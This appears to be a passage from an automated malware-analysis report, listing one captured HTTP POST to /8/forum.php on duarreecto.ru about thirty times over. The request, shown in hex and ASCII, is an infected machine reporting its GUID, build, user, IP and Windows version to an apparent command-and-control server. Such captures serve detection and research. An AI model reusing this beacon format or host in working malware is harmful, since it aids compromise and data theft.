      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
